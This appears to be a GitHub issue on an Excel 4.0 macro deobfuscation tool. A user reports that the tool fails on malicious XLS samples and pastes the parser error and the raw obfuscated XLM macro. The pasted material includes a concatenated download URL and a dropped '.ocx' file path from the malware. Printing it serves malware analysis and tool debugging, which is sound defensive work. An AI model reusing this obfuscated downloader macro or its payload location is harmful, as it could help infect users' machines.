Open cccs-jh opened 2 years ago
https://www.virustotal.com/gui/file/756186368250a9902ae168c2f0c6a77d3fdd70f7a5589c36f8c7bd80cf8756e4 is another sample with this problem. I've looked into this issue a bit, and it looks like there are two problems with analyzing the sample:
Running xlmdeobfuscator on this file: https://www.virustotal.com/gui/file/a0de1f3af78bef68ddfcabf4b7cedfa0e466ac65648a5e81e591702b463c96b1 gives the following error:
Unencrypted xls file
[Loading Cells] auto_open: auto_open->'KBRSBTL'!$J$1 [Starting Deobfuscation] CELL:J12 , FullEvaluation , "False" Error [deobfuscator.py:2586 parse_tree = self.xlm_parser.parse(formula)]: Unexpected token Token('__ANON_0', ':"&"//")&"su")&"bb")&"al")&"ak")&"sh")&"mi.c")&"o")&"m/d")&"a",25352.0)=TEXT(((((("t"&"a_w")&"in")&"ni")&"ng/k")&"Yv6")&"xb/",3646.0)","..\peg1.ocx",0,0)') at line 1, column 69. Expected one of:
The raw XLM macro, as extracted by olevba, is:
' RAW EXCEL4/XLM MACRO FORMULAS: ' SHEET: KBRSBTL, Macrosheet ' CELL:J12, =(((((((FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!G24)&'THJD'!D15)&'SGGSBe'!D8)&'THJD'!R19,J15)=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!D8)&'KBSNTND'!F24)&'KBSNTND'!L31,J17))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!H26)&'THJD'!D15)&'SGGSBe'!H13)&'THJD'!R19,J19))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!H13)&'KBSNTND'!F24)&'KBSNTND'!L31,J21))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!I24)&'THJD'!D15)&'SGGSBe'!M3)&'THJD'!R19,J23))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSNTND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!M3)&'KBSNTND'!F24)&'KBSNTND'!L31,J25))=FORMULA((((((((((((('KBSNTND'!L24&'KBSNTND'!L26)&'KBSNTND'!L27)&'KBSNTND'!L28)&'KBSNTND'!L28)&'ORHINSNR'!L11)&'ORHINSNR'!D18)&'KBSNTND'!F10)&'ORHINSNR'!S22)&'SGGSBe'!O6)&'ORHINSNR'!J26)&'THJD'!D15)&'SGGSBe'!R17)&'THJD'!R19,J27))=FORMULA((((((((((((((((((('KBSNTND'!L24&'KBSNTND'!G8)&'KBSNTND'!F4)&'KBSNTND'!G8)&'KBSNTND'!O3)&'KBSN
TND'!L30)&'KBSNTND'!F24)&'KBSNTND'!O3)&'THJD'!J11)&'THJD'!C5)&'KBSNTND'!A4)&'THJD'!H22)&'KBSNTND'!A4)&'THJD'!B19)&'KBSNTND'!F10)&'THJD'!L26)&'THJD'!P2)&'SGGSBe'!R17)&'KBSNTND'!F24)&'KBSNTND'!L31,J29))=FORMULA((('KBSNTND'!L24&'KBSNTND'!G44)&'KBSNTND'!H46)&'KBSNTND'!J44,J49), 1